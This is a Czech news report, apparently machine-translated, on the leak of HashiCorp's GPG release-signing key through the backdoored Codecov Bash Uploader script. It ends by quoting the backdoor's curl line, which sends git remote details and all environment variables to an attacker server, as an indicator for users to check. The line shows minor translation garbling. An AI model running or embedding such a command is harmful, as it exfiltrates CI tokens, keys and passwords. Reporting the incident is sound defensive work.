HashiCorp, známý vývojem open source nástrojů Vagrant, Packer, Nomad a Terraform, oznámil únik soukromého klíče GPG používaného k vytváření digitálních podpisů, které ověřují vydání. Útočníci, kteří získali přístup ke klíči GPG, mohli potenciálně provést skryté změny v produktech HashiCorp jejich ověřením pomocí správného digitálního podpisu. Společnost zároveň uvedla, že během auditu nebyly identifikovány žádné stopy po pokusech o takové úpravy.
V současné době byl kompromitovaný klíč GPG odvolán a místo něj byl zaveden nový klíč. Problém ovlivnil pouze ověřování pomocí souborů SHA256SUM a SHA256SUM.sig a neovlivnil generování digitálních podpisů pro balíčky Linux DEB a RPM dodávané prostřednictvím releases.hashicorp.com, ani mechanismy ověřování vydání pro macOS a Windows (AuthentiCode) .
K úniku došlo kvůli použití skriptu Codecov Bash Uploader (codecov-bash) v infrastruktuře, který je navržen pro stahování zpráv o pokrytí ze systémů průběžné integrace. Při útoku na společnost Codecov byla do zadaného skriptu skryta zadní vrátka, přes kterou byla na server útočníků posílána hesla a šifrovací klíče.
K hacknutí útočníci využili chyby v procesu vytváření obrazu Codecov Docker, což jim umožnilo extrahovat přístupová data do GCS (Google Cloud Storage), což je nutné k provedení změn ve skriptu Bash Uploader distribuovaného z codecov.io. webová stránka. Změny byly provedeny již 31. ledna, zůstaly nezjištěny po dobu dvou měsíců a umožnily útočníkům extrahovat informace uložené v zákaznických kontinuálních integračních systémových prostředích. Pomocí přidaného škodlivého kódu by útočníci mohli získat informace o testovaném úložišti Git a všech proměnných prostředí, včetně tokenů, šifrovacích klíčů a hesel přenášených do systémů průběžné integrace za účelem organizace přístupu ke kódu aplikací, úložištím a službám, jako jsou Amazon Web Services a GitHub.
Kromě přímého volání byl skript Codecov Bash Uploader použit v rámci dalších uploaderů, jako jsou Codecov-action (Github), Codecov-circleci-orb a Codecov-bitrise-step, jejichž uživatelů se problém také týká. Všem uživatelům codecov-bash a souvisejících produktů se doporučuje auditovat jejich infrastruktury a také měnit hesla a šifrovací klíče. Přítomnost zadních vrátek ve skriptu můžete zkontrolovat přítomností řádku curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /upload/v2 || skutečný
Zdroj: opennet.ru